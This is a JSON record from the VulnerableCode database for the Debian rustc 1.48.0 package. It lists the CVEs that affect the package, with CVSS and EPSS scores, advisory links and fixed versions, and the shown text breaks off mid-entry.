{"url":"http://public2.vulnerablecode.io/api/packages/994782?format=json","purl":"pkg:deb/debian/rustc@1.48.0%2Bdfsg1-2","type":"deb","namespace":"debian","name":"rustc","version":"1.48.0+dfsg1-2","qualifiers":{},"subpath":"","is_vulnerable":true,"next_non_vulnerable_version":"1.70.0+dfsg1-9","latest_non_vulnerable_version":"1.86.0+dfsg1-1~bpo13+2","affected_by_vulnerabilities":[{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/31468?format=json","vulnerability_id":"VCID-4khp-kevq-xff5","summary":"Multiple vulnerabilities have been discovered in Rust, the worst of which could result in denial of service.","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-28875.json","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-28875.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2021-28875","reference_id":"","reference_type":"","scores":[{"value":"0.00416","scoring_system":"epss","scoring_elements":"0.61571","published_at":"2026-04-01T12:55:00Z"},{"value":"0.00416","scoring_system":"epss","scoring_elements":"0.61733","published_at":"2026-04-29T12:55:00Z"},{"value":"0.00416","scoring_system":"epss","scoring_elements":"0.61724","published_at":"2026-04-24T12:55:00Z"},{"value":"0.00416","scoring_system":"epss","scoring_elements":"0.61741","published_at":"2026-04-26T12:55:00Z"},{"value":"0.00416","scoring_system":"epss","scoring_elements":"0.61645","published_at":"2026-04-02T12:55:00Z"},{"value":"0.00416","scoring_system":"epss","scoring_elements":"0.61676","published_at":"2026-04-04T12:55:00Z"},{"value":"0.00416","scoring_system":"epss","scoring_elements":"0.61647","published_at":"2026-04-07T12:55:00Z"},{"value":"0.00416","scoring_system":"epss","scoring_elements":"0.61695","published_at":"2026-04-08T12:55:00Z"},{"value":"0.00416","scoring_system":"epss","scoring_elements":"0.61711","published_at":"2026-04-09T12:55:00Z"},{"value":"0.00416","scoring_system":"epss","scoring_elements":"0.61732","published_at":"2026-04-11T12:55:00Z"},{"value":"0.00416","scoring_system":"epss","scoring_elements":"0.6172","published_at":"2026-04-12T12:55:00Z"},{"value":"0.00416","scoring_system":"epss","scoring_elements":"0.617","published_at":"2026-04-13T12:55:00Z"},{"value":"0.00416","scoring_system":"epss","scoring_elements":"0.61742","published_at":"2026-04-16T12:55:00Z"},{"value":"0.00416","scoring_system":"epss","scoring_elements":"0.61747","published_at":"2026-04-18T12:55:00Z"},{"value":"0.00416","scoring_system":"epss","scoring_elements":"0.6173","published_at":"2026-04-21T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2021-28875"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28875","reference_id":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28875"},{"reference_url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}],"url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=1949194","reference_id":"1949194","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=1949194"},{"reference_url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=986803","reference_id":"986803","reference_type":"","scores":[],"url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=986803"},{"reference_url":"https://security.archlinux.org/AVG-1803","reference_id":"AVG-1803","reference_type":"","scores":[{"value":"Medium","scoring_system":"archlinux","scoring_elements":""}],"url":"https://security.archlinux.org/AVG-1803"},{"reference_url":"https://security.gentoo.org/glsa/202210-09","reference_id":"GLSA-202210-09","reference_type":"","scores":[],"url":"https://security.gentoo.org/glsa/202210-09"},{"reference_url":"https://access.redhat.com/errata/RHSA-2021:3042","reference_id":"RHSA-2021:3042","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2021:3042"},{"reference_url":"https://access.redhat.com/errata/RHSA-2021:3063","reference_id":"RHSA-2021:3063","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2021:3063"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/994783?format=json","purl":"pkg:deb/debian/rustc@1.63.0%2Bdfsg1-2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-ehdy-7aak-r3bt"},{"vulnerability":"VCID-qj1y-b8m1-hyfm"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.63.0%252Bdfsg1-2"}],"aliases":["CVE-2021-28875"],"risk_score":3.4,"exploitability":"0.5","weighted_severity":"6.8","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-4khp-kevq-xff5"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/31477?format=json","vulnerability_id":"VCID-69zd-gcvx-fuhr","summary":"Multiple vulnerabilities have been discovered in Rust, the worst of which could result in denial of service.","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-42574.json","reference_id":"","reference_type":"","scores":[{"value":"8.5","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-42574.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2021-42574","reference_id":"","reference_type":"","scores":[{"value":"0.24988","scoring_system":"epss","scoring_elements":"0.96175","published_at":"2026-04-16T12:55:00Z"},{"value":"0.24988","scoring_system":"epss","scoring_elements":"0.96167","published_at":"2026-04-13T12:55:00Z"},{"value":"0.24988","scoring_system":"epss","scoring_elements":"0.96165","published_at":"2026-04-12T12:55:00Z"},{"value":"0.24988","scoring_system":"epss","scoring_elements":"0.9618","published_at":"2026-04-18T12:55:00Z"},{"value":"0.25471","scoring_system":"epss","scoring_elements":"0.96236","published_at":"2026-04-29T12:55:00Z"},{"value":"0.25471","scoring_system":"epss","scoring_elements":"0.96181","published_at":"2026-04-01T12:55:00Z"},{"value":"0.25471","scoring_system":"epss","scoring_elements":"0.96189","published_at":"2026-04-02T12:55:00Z"},{"value":"0.25471","scoring_system":"epss","scoring_elements":"0.96197","published_at":"2026-04-04T12:55:00Z"},{"value":"0.25471","scoring_system":"epss","scoring_elements":"0.962","published_at":"2026-04-07T12:55:00Z"},{"value":"0.25471","scoring_system":"epss","scoring_elements":"0.9621","published_at":"2026-04-08T12:55:00Z"},{"value":"0.25471","scoring_system":"epss","scoring_elements":"0.96213","published_at":"2026-04-09T12:55:00Z"},{"value":"0.25471","scoring_system":"epss","scoring_elements":"0.96232","published_at":"2026-04-21T12:55:00Z"},{"value":"0.25471","scoring_system":"epss","scoring_elements":"0.96233","published_at":"2026-04-24T12:55:00Z"},{"value":"0.25471","scoring_system":"epss","scoring_elements":"0.96234","published_at":"2026-04-26T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2021-42574"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42574","reference_id":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42574"},{"reference_url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml","reference_id":"","reference_type":"","scores":[{"value":"8.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H"}],"url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml"},{"reference_url":"http://www.openwall.com/lists/oss-security/2021/11/01/1","reference_id":"1","reference_type":"","scores":[{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-06-11T15:16:49Z/"}],"url":"http://www.openwall.com/lists/oss-security/2021/11/01/1"},{"reference_url":"http://www.openwall.com/lists/oss-security/2021/11/02/10","reference_id":"10","reference_type":"","scores":[{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-06-11T15:16:49Z/"}],"url":"http://www.openwall.com/lists/oss-security/2021/11/02/10"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2005819","reference_id":"2005819","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2005819"},{"reference_url":"http://www.openwall.com/lists/oss-security/2021/11/01/4","reference_id":"4","reference_type":"","scores":[{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-06-11T15:16:49Z/"}],"url":"http://www.openwall.com/lists/oss-security/2021/11/01/4"},{"reference_url":"http://www.openwall.com/lists/oss-security/2021/11/01/5","reference_id":"5","reference_type":"","scores":[{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-06-11T15:16:49Z/"}],"url":"http://www.openwall.com/lists/oss-security/2021/11/01/5"},{"reference_url":"http://www.openwall.com/lists/oss-security/2021/11/01/6","reference_id":"6","reference_type":"","scores":[{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-06-11T15:16:49Z/"}],"url":"http://www.openwall.com/lists/oss-security/2021/11/01/6"},{"reference_url":"https://www.kb.cert.org/vuls/id/999008","reference_id":"999008","reference_type":"","scores":[{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-06-11T15:16:49Z/"}],"url":"https://www.kb.cert.org/vuls/id/999008"},{"reference_url":"https://security.archlinux.org/AVG-2506","reference_id":"AVG-2506","reference_type":"","scores":[{"value":"Medium","scoring_system":"archlinux","scoring_elements":""}],"url":"https://security.archlinux.org/AVG-2506"},{"reference_url":"https://security.gentoo.org/glsa/202210-09","reference_id":"GLSA-202210-09","reference_type":"","scores":[{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-06-11T15:16:49Z/"}],"url":"https://security.gentoo.org/glsa/202210-09"},{"reference_url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/IH2RG5YTR6ZZOLUV3EUPZEIJR7XHJLVD/","reference_id":"IH2RG5YTR6ZZOLUV3EUPZEIJR7XHJLVD","reference_type":"","scores":[{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-06-11T15:16:49Z/"}],"url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/IH2RG5YTR6ZZOLUV3EUPZEIJR7XHJLVD/"},{"reference_url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/LQNTFF24ROHLVPLUOEISBN3F7QM27L4U/","reference_id":"LQNTFF24ROHLVPLUOEISBN3F7QM27L4U","reference_type":"","scores":[{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-06-11T15:16:49Z/"}],"url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/LQNTFF24ROHLVPLUOEISBN3F7QM27L4U/"},{"reference_url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QUPA37D57VPTDLSXOOGF4UXUEADOC4PQ/","reference_id":"QUPA37D57VPTDLSXOOGF4UXUEADOC4PQ","reference_type":"","scores":[{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-06-11T15:16:49Z/"}],"url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QUPA37D57VPTDLSXOOGF4UXUEADOC4PQ/"},{"reference_url":"https://access.redhat.com/errata/RHSA-2021:4033","reference_id":"RHSA-2021:4033","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2021:4033"},{"reference_url":"https://access.redhat.com/errata/RHSA-2021:4034","reference_id":"RHSA-2021:4034","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2021:4034"},{"reference_url":"https://access.redhat.com/errata/RHSA-2021:4035","reference_id":"RHSA-2021:4035","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2021:4035"},{"reference_url":"https://access.redhat.com/errata/RHSA-2021:4036","reference_id":"RHSA-2021:4036","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2021:4036"},{"reference_url":"https://access.redhat.com/errata/RHSA-2021:4037","reference_id":"RHSA-2021:4037","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2021:4037"},{"reference_url":"https://access.redhat.com/errata/RHSA-2021:4038","reference_id":"RHSA-2021:4038","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2021:4038"},{"reference_url":"https://access.redhat.com/errata/RHSA-2021:4039","reference_id":"RHSA-2021:4039","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2021:4039"},{"reference_url":"https://access.redhat.com/errata/RHSA-2021:4585","reference_id":"RHSA-2021:4585","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2021:4585"},{"reference_url":"https://access.redhat.com/errata/RHSA-2021:4586","reference_id":"RHSA-2021:4586","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2021:4586"},{"reference_url":"https://access.redhat.com/errata/RHSA-2021:4587","reference_id":"RHSA-2021:4587","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2021:4587"},{"reference_url":"https://access.redhat.com/errata/RHSA-2021:4588","reference_id":"RHSA-2021:4588","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2021:4588"},{"reference_url":"https://access.redhat.com/errata/RHSA-2021:4589","reference_id":"RHSA-2021:4589","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2021:4589"},{"reference_url":"https://access.redhat.com/errata/RHSA-2021:4590","reference_id":"RHSA-2021:4590","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2021:4590"},{"reference_url":"https://access.redhat.com/errata/RHSA-2021:4591","reference_id":"RHSA-2021:4591","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2021:4591"},{"reference_url":"https://access.redhat.com/errata/RHSA-2021:4592","reference_id":"RHSA-2021:4592","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2021:4592"},{"reference_url":"https://access.redhat.com/errata/RHSA-2021:4593","reference_id":"RHSA-2021:4593","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2021:4593"},{"reference_url":"https://access.redhat.com/errata/RHSA-2021:4594","reference_id":"RHSA-2021:4594","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2021:4594"},{"reference_url":"https://access.redhat.com/errata/RHSA-2021:4595","reference_id":"RHSA-2021:4595","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2021:4595"},{"reference_url":"https://access.redhat.com/errata/RHSA-2021:4596","reference_id":"RHSA-2021:4596","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2021:4596"},{"reference_url":"https://access.redhat.com/errata/RHSA-2021:4598","reference_id":"RHSA-2021:4598","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2021:4598"},{"reference_url":"https://access.redhat.com/errata/RHSA-2021:4599","reference_id":"RHSA-2021:4599","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2021:4599"},{"reference_url":"https://access.redhat.com/errata/RHSA-2021:4600","reference_id":"RHSA-2021:4600","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2021:4600"},{"reference_url":"https://access.redhat.com/errata/RHSA-2021:4601","reference_id":"RHSA-2021:4601","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2021:4601"},{"reference_url":"https://access.redhat.com/errata/RHSA-2021:4602","reference_id":"RHSA-2021:4602","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2021:4602"},{"reference_url":"https://access.redhat.com/errata/RHSA-2021:4649","reference_id":"RHSA-2021:4649","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2021:4649"},{"reference_url":"https://access.redhat.com/errata/RHSA-2021:4669","reference_id":"RHSA-2021:4669","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2021:4669"},{"reference_url":"https://access.redhat.com/errata/RHSA-2021:4694","reference_id":"RHSA-2021:4694","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2021:4694"},{"reference_url":"https://access.redhat.com/errata/RHSA-2021:4723","reference_id":"RHSA-2021:4723","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2021:4723"},{"reference_url":"https://access.redhat.com/errata/RHSA-2021:4724","reference_id":"RHSA-2021:4724","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2021:4724"},{"reference_url":"https://access.redhat.com/errata/RHSA-2021:4729","reference_id":"RHSA-2021:4729","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2021:4729"},{"reference_url":"https://access.redhat.com/errata/RHSA-2021:4730","reference_id":"RHSA-2021:4730","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2021:4730"},{"reference_url":"https://access.redhat.com/errata/RHSA-2021:4743","reference_id":"RHSA-2021:4743","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2021:4743"},{"reference_url":"https://www.starwindsoftware.com/security/sw-20220804-0002/","reference_id":"sw-20220804-0002","reference_type":"","scores":[{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-06-11T15:16:49Z/"}],"url":"https://www.starwindsoftware.com/security/sw-20220804-0002/"},{"reference_url":"https://www.unicode.org/reports/tr31/","reference_id":"tr31","reference_type":"","scores":[{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-06-11T15:16:49Z/"}],"url":"https://www.unicode.org/reports/tr31/"},{"reference_url":"https://www.unicode.org/reports/tr36/","reference_id":"tr36","reference_type":"","scores":[{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-06-11T15:16:49Z/"}],"url":"https://www.unicode.org/reports/tr36/"},{"reference_url":"https://www.unicode.org/reports/tr39/","reference_id":"tr39","reference_type":"","scores":[{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-06-11T15:16:49Z/"}],"url":"https://www.unicode.org/reports/tr39/"},{"reference_url":"https://www.unicode.org/reports/tr9/tr9-44.html#HL4","reference_id":"tr9-44.html#HL4","reference_type":"","scores":[{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-06-11T15:16:49Z/"}],"url":"https://www.unicode.org/reports/tr9/tr9-44.html#HL4"},{"reference_url":"https://www.scyon.nl/post/trojans-in-your-source-code","reference_id":"trojans-in-your-source-code","reference_type":"","scores":[{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-06-11T15:16:49Z/"}],"url":"https://www.scyon.nl/post/trojans-in-your-source-code"},{"reference_url":"https://trojansource.codes","reference_id":"trojansource.codes","reference_type":"","scores":[{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-06-11T15:16:49Z/"}],"url":"https://trojansource.codes"},{"reference_url":"http://www.unicode.org/versions/Unicode14.0.0/","reference_id":"Unicode14.0.0","reference_type":"","scores":[{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-06-11T15:16:49Z/"}],"url":"http://www.unicode.org/versions/Unicode14.0.0/"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/994783?format=json","purl":"pkg:deb/debian/rustc@1.63.0%2Bdfsg1-2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-ehdy-7aak-r3bt"},{"vulnerability":"VCID-qj1y-b8m1-hyfm"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.63.0%252Bdfsg1-2"}],"aliases":["CVE-2021-42574"],"risk_score":3.9,"exploitability":"0.5","weighted_severity":"7.7","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-69zd-gcvx-fuhr"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/31469?format=json","vulnerability_id":"VCID-7ap9-xghv-dbdy","summary":"Multiple vulnerabilities have been discovered in Rust, the worst of which could result in denial of service.","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-28876.json","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-28876.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2021-28876","reference_id":"","reference_type":"","scores":[{"value":"0.00419","scoring_system":"epss","scoring_elements":"0.61752","published_at":"2026-04-01T12:55:00Z"},{"value":"0.00419","scoring_system":"epss","scoring_elements":"0.61918","published_at":"2026-04-29T12:55:00Z"},{"value":"0.00419","scoring_system":"epss","scoring_elements":"0.61908","published_at":"2026-04-24T12:55:00Z"},{"value":"0.00419","scoring_system":"epss","scoring_elements":"0.61926","published_at":"2026-04-26T12:55:00Z"},{"value":"0.00419","scoring_system":"epss","scoring_elements":"0.61826","published_at":"2026-04-02T12:55:00Z"},{"value":"0.00419","scoring_system":"epss","scoring_elements":"0.61857","published_at":"2026-04-04T12:55:00Z"},{"value":"0.00419","scoring_system":"epss","scoring_elements":"0.61827","published_at":"2026-04-07T12:55:00Z"},{"value":"0.00419","scoring_system":"epss","scoring_elements":"0.61876","published_at":"2026-04-08T12:55:00Z"},{"value":"0.00419","scoring_system":"epss","scoring_elements":"0.61892","published_at":"2026-04-09T12:55:00Z"},{"value":"0.00419","scoring_system":"epss","scoring_elements":"0.61913","published_at":"2026-04-11T12:55:00Z"},{"value":"0.00419","scoring_system":"epss","scoring_elements":"0.61901","published_at":"2026-04-12T12:55:00Z"},{"value":"0.00419","scoring_system":"epss","scoring_elements":"0.61881","published_at":"2026-04-13T12:55:00Z"},{"value":"0.00419","scoring_system":"epss","scoring_elements":"0.61924","published_at":"2026-04-16T12:55:00Z"},{"value":"0.00419","scoring_system":"epss","scoring_elements":"0.61929","published_at":"2026-04-18T12:55:00Z"},{"value":"0.00419","scoring_system":"epss","scoring_elements":"0.61912","published_at":"2026-04-21T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2021-28876"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28876","reference_id":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28876"},{"reference_url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}],"url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=1949198","reference_id":"1949198","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=1949198"},{"reference_url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=986803","reference_id":"986803","reference_type":"","scores":[],"url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=986803"},{"reference_url":"https://security.archlinux.org/AVG-1801","reference_id":"AVG-1801","reference_type":"","scores":[{"value":"Medium","scoring_system":"archlinux","scoring_elements":""}],"url":"https://security.archlinux.org/AVG-1801"},{"reference_url":"https://security.gentoo.org/glsa/202210-09","reference_id":"GLSA-202210-09","reference_type":"","scores":[],"url":"https://security.gentoo.org/glsa/202210-09"},{"reference_url":"https://access.redhat.com/errata/RHSA-2021:3042","reference_id":"RHSA-2021:3042","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2021:3042"},{"reference_url":"https://access.redhat.com/errata/RHSA-2021:3063","reference_id":"RHSA-2021:3063","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2021:3063"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/994783?format=json","purl":"pkg:deb/debian/rustc@1.63.0%2Bdfsg1-2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-ehdy-7aak-r3bt"},{"vulnerability":"VCID-qj1y-b8m1-hyfm"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.63.0%252Bdfsg1-2"}],"aliases":["CVE-2021-28876"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-7ap9-xghv-dbdy"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/31474?format=json","vulnerability_id":"VCID-d8yv-ngej-1kf7","summary":"Multiple vulnerabilities have been discovered in Rust, the worst of which could result in denial of service.","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-31162.json","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-31162.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2021-31162","reference_id":"","reference_type":"","scores":[{"value":"0.00737","scoring_system":"epss","scoring_elements":"0.72765","published_at":"2026-04-01T12:55:00Z"},{"value":"0.00737","scoring_system":"epss","scoring_elements":"0.72913","published_at":"2026-04-29T12:55:00Z"},{"value":"0.00737","scoring_system":"epss","scoring_elements":"0.72905","published_at":"2026-04-24T12:55:00Z"},{"value":"0.00737","scoring_system":"epss","scoring_elements":"0.72915","published_at":"2026-04-26T12:55:00Z"},{"value":"0.00737","scoring_system":"epss","scoring_elements":"0.72773","published_at":"2026-04-02T12:55:00Z"},{"value":"0.00737","scoring_system":"epss","scoring_elements":"0.72793","published_at":"2026-04-04T12:55:00Z"},{"value":"0.00737","scoring_system":"epss","scoring_elements":"0.72769","published_at":"2026-04-07T12:55:00Z"},{"value":"0.00737","scoring_system":"epss","scoring_elements":"0.72808","published_at":"2026-04-08T12:55:00Z"},{"value":"0.00737","scoring_system":"epss","scoring_elements":"0.72822","published_at":"2026-04-09T12:55:00Z"},{"value":"0.00737","scoring_system":"epss","scoring_elements":"0.72846","published_at":"2026-04-11T12:55:00Z"},{"value":"0.00737","scoring_system":"epss","scoring_elements":"0.72829","published_at":"2026-04-12T12:55:00Z"},{"value":"0.00737","scoring_system":"epss","scoring_elements":"0.72821","published_at":"2026-04-13T12:55:00Z"},{"value":"0.00737","scoring_system":"epss","scoring_elements":"0.72862","published_at":"2026-04-16T12:55:00Z"},{"value":"0.00737","scoring_system":"epss","scoring_elements":"0.72873","published_at":"2026-04-18T12:55:00Z"},{"value":"0.00737","scoring_system":"epss","scoring_elements":"0.72864","published_at":"2026-04-21T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2021-31162"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31162","reference_id":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31162"},{"reference_url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}],"url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=1950398","reference_id":"1950398","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=1950398"},{"reference_url":"https://security.archlinux.org/AVG-1801","reference_id":"AVG-1801","reference_type":"","scores":[{"value":"Medium","scoring_system":"archlinux","scoring_elements":""}],"url":"https://security.archlinux.org/AVG-1801"},{"reference_url":"https://security.gentoo.org/glsa/202210-09","reference_id":"GLSA-202210-09","reference_type":"","scores":[],"url":"https://security.gentoo.org/glsa/202210-09"},{"reference_url":"https://access.redhat.com/errata/RHSA-2021:3042","reference_id":"RHSA-2021:3042","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2021:3042"},{"reference_url":"https://access.redhat.com/errata/RHSA-2021:3063","reference_id":"RHSA-2021:3063","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2021:3063"}],"fixed_packages":[{"url":"h